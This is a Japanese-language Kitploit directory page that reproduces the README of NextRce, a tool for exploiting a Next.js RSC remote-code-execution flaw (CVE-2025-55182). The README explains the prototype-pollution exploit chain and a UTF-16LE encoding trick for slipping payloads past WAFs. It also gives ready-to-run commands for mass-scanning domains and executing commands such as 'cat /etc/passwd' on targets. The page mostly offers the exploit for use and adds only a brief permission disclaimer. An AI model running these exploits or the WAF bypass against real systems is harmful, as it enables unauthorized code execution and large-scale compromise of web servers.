Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
NextRce — React Shell & Next.js RSC エクスプロイトツール (CVE-2025-55182) | Kitploit
ツール/GitHubGitHub/ynsmroztas/nextrce
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストコマンド&コントロールペイロード開発
GitHubynsmroztas/nextrce

NextRce

React Shell & Next.js RSC エクスプロイトツール (CVE-2025-55182)

リポジトリを見る
255588ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

NextRce - Next.js RSC エクスプロイトツール (CVE-2025-55182)

NextRce ロゴ

Python Vulnerability WAF Bypass License Twitter

Next.js App Router 向けの高度な脆弱性スキャナー & エクスプロイター

開発者: Mitsec


🔥 新機能: WAFバイパスモード (UTF-16LE)

child_process や execSync などのキーワードを含む標準的なペイロードは、Webアプリケーションファイアウォール(WAF)によってブロックされることがよくあります。

NextRCSWaff.py は、特殊な UTF-16LE (リトルエンディアン) エンコーディングエンジンを利用します。悪意のあるペイロードをこの特定のフォーマットでエンコードすることにより、バイトシーケンスが完全に変化し、ほとんどのシグネチャベースのWAFから不可視になります。しかし、Next.js (Node.js) サーバーは正しくデコードしてコマンドを実行します。

WAFバイパスの概念実証

概念実証: 上のスクリーンショットは、標準的なペイロードがブロックされている様子(上)と、その後 --bypass フラグを付けて NextRCSWaff.py を使用したRCEの成功(下)を示しています。


📖 説明

NextRce は、CVE-2025-55182 を検出および悪用するために設計された、高性能でマルチスレッドのセキュリティツールです。特に、Next.js App Router アーキテクチャ内の React Server Components (RSC) 実装を標的としています。

Server Actions のシリアル化処理を操作することにより、NextRce は細工されたペイロードを注入し、脆弱なインスタンス上で リモートコード実行(RCE) を達成します。脆弱な App Router アーキテクチャと安全なレガシー Pages Router を自動的に区別するスマートな検出エンジンを備えており、大量スキャン時の効率を確保します。

🚀 主な機能

  • 🛡️ WAFバイパス (NextRCSWaff.py): UTF-16LEエンコーディングを利用して、サーバー側のペイロードの整合性を維持しながらWAF検出を回避します。
  • スマートアーキテクチャ検出: DOM(window.__next_f を探す)をヒューリスティックに分析し、脆弱な App Router ターゲットとレガシー Pages Router サイトを識別します。
  • パイプライン & CI/CD 対応: stdin パイピングを完全サポート。subfinder、httpx、gau などの偵察ツールとシームレスに統合します。
  • 大量スキャンエンジン: 組み込みの ThreadPoolExecutor により、最小限のリソースオーバーヘッドで数千のドメインを同時にスキャンできます。
  • 自動パース: 混合入力形式(ステータスコード、タイトル、生ログなど)から有効なURLを自動的に抽出します。
  • ライブRCEフィードバック: コマンドを実行し、サーバーの応答ダイジェストから直接出力を取得します。

🔍 技術分析

脆弱性 (CVE-2025-55182)

Next.js App Router は、React Server Components (RSC) 向けのカスタムシリアル化フォーマットを利用しています。脆弱性は Next-Action ヘッダーのデシリアル化ロジックに存在します。特に細工されたオブジェクト(__proto__ を汚染する)がサーバーアクションエンドポイント(例: /adfa)に送信されると、内部パーサーが child_process を介して任意のNode.jsコードを実行させられる可能性があります。

エクスプロイトのワークフロー

  1. 偵察: NextRce は無害なプローブを送信し、X-Powered-By: Next.js ヘッダーや特定のパス構造(/_next/)を確認します。
  2. フィンガープリンティング: 応答本文から App Router のハイドレーションマーカーをスキャンします:
    • window.__next_f -> 脆弱 (App Router)
    • __NEXT_DATA__ -> 安全 (Pages Router)
  3. ペイロード注入: アーキテクチャが脆弱な場合、NextRce はプロトタイプを標的としたシリアル化された悪意のあるJSONオブジェクトを含む multipart/form-data リクエストを構築します。
  4. 実行と外部への流出: ペイロードはサーバーに execSync(cmd) を強制します。stdout は base64 エンコードされ、サーバーのエラー応答の digest フィールドに返され、NextRce がこれをデコードして表示します。

🛠️ インストール

root@kitploit:~
# リポジトリをクローン
git clone [https://github.com/ynsmroztas/NextRce.git](https://github.com/ynsmroztas/NextRce.git)

# ディレクトリに移動
cd NextRce

# 依存関係をインストール
pip install requests

💻 使用例

1. WAFバイパスモード (NextRCSWaff.py 使用)

ターゲットが脆弱に見えるが標準的なエクスプロイトがブロックされている場合にこのスクリプトを使用します。

root@kitploit:~
# --bypass フラグで UTF-16LE エンコーディングを有効化
python3 NextRCSWaff.py -u https://target.com -c "whoami" --bypass

2. パイプラインモード / バグバウンティモード

Linux パイプライン向けに設計されています。サブドメインリストをツールに直接パイプします。

root@kitploit:~
# 標準スキャン
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 nextrce.py -c "id" -t 50

# WAFバイパススキャン
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 NextRCSWaff.py -c "id" -B

3. 単一ターゲットスキャン

標準スクリプトを使用して、カスタムコマンドで特定のエンドポイントをテストします。

root@kitploit:~
python3 nextrce.py -u https://vulnerable.target.com -c "cat /etc/passwd"

4. ファイルからの大量スキャン

高い並行性でファイルからURLのリストをスキャンします。

root@kitploit:~
python3 nextrce.py -l targets.txt -c "whoami" -t 100

5. プロキシモード (デバッグ)

Burp Suite または他のプロキシを経由してトラフィックをルーティングし、分析します。

root@kitploit:~
python3 nextrce.py -u https://target.com -p http://127.0.0.1:8080

⚙️ コマンドラインオプション

フラグ,説明,デフォルト "-u, --url","スキャンする単一ターゲットURL",None "-l, --list","URLリストを含むファイルパス",None "-c, --cmd","サーバー上で実行するコマンド",id "-t, --threads","同時スレッド数",30 "-p, --proxy","HTTPプロキシURL (例: http://127.0.0.1:8080)",None "-v, --verbose","詳細出力を有効にする (失敗した試行を表示)",False "-B, --bypass","(NextRCSWaff.py のみ) WAFをバイパスするためにUTF-16LEエンコーディングを有効にする",False

⚠️ 免責事項

このツールは教育およびセキュリティ研究目的のみで開発されています。著者 (Mitsec) は、このツールの不正使用、損害、または無許可アクセスについて一切の責任を負いません。セキュリティテストを実行する前に、常にシステム所有者から明示的な許可を取得してください。

👤 著者

NextRce は Mitsec によって開発・メンテナンスされています。

Twitter/X: @ynsmroztas

GitHub: ynsmroztas

ツールをダウンロード